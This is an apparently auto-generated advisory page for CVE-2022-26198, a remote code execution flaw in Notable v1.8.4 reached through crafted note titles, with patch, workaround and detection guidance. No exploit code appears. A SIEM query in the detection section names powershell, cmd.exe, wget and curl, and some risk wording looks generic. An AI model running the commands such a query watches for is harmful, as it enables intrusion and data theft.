Login Sign Up

CVE-2022-26198

9.8 CRITICAL
Remote Code Execution

📋 TL;DR

CVE-2022-26198 is a critical remote code execution vulnerability in Notable v1.8.4 where attackers can inject malicious payloads into the Title text field to execute arbitrary code on the system. This affects all users running Notable v1.8.4 who edit or view notes with crafted titles. The vulnerability stems from improper input sanitization in the text editing functionality.

💻 Affected Systems

Products:
  • Notable
Versions: v1.8.4
Operating Systems: Windows, macOS, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: All installations of Notable v1.8.4 are vulnerable regardless of configuration. The vulnerability is in the core application code.

📦 What is this software?

Notable by Notable

View all CVEs affecting Notable →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise allowing attackers to execute arbitrary commands, install malware, steal data, or pivot to other systems on the network.

🟠

Likely Case

Remote code execution leading to data theft, system manipulation, or installation of backdoors on vulnerable Notable instances.

🟢

If Mitigated

No impact if proper input validation and sanitization are implemented, or if the vulnerable version is not exposed to untrusted users.

🌐 Internet-Facing: HIGH - Any internet-facing Notable instance with the vulnerable version can be exploited remotely without authentication.
🏢 Internal Only: HIGH - Even internal instances are vulnerable to attacks from compromised internal users or lateral movement attempts.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The GitHub issue shows proof-of-concept exploitation details. Attackers can craft malicious titles that execute code when viewed or edited.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: v1.9.0 or later

Vendor Advisory: https://github.com/notable/notable/issues/1595

Restart Required: Yes

Instructions:

1. Backup your Notable data. 2. Download and install Notable v1.9.0 or later from the official GitHub releases. 3. Replace the existing installation. 4. Restart Notable to apply the update.

🔧 Temporary Workarounds

Disable Note Sharing

all

Prevent sharing notes with untrusted users to reduce attack surface

Input Validation Filter

all

Implement custom input validation to sanitize title fields before processing

🧯 If You Can't Patch

  • Isolate Notable instances on segmented networks with strict firewall rules
  • Implement application-level WAF rules to detect and block malicious payloads in title fields

🔍 How to Verify

Check if Vulnerable:

Check Notable version in Help > About menu. If version is exactly 1.8.4, the system is vulnerable.

Check Version:

Notable does not have a CLI version check. Use Help > About menu in the application.

Verify Fix Applied:

After updating, verify version is 1.9.0 or later in Help > About menu.

📡 Detection & Monitoring

Log Indicators:

  • Unusual process execution from Notable
  • Suspicious command-line arguments in Notable processes
  • Multiple failed attempts to access restricted system resources

Network Indicators:

  • Unexpected outbound connections from Notable process
  • Beaconing behavior to external IPs

SIEM Query:

process_name:"Notable.exe" AND (command_line:*powershell* OR command_line:*cmd.exe* OR command_line:*wget* OR command_line:*curl*)

📊 Metadata

CVE ID: CVE-2022-26198
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Published: March 27, 2022
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON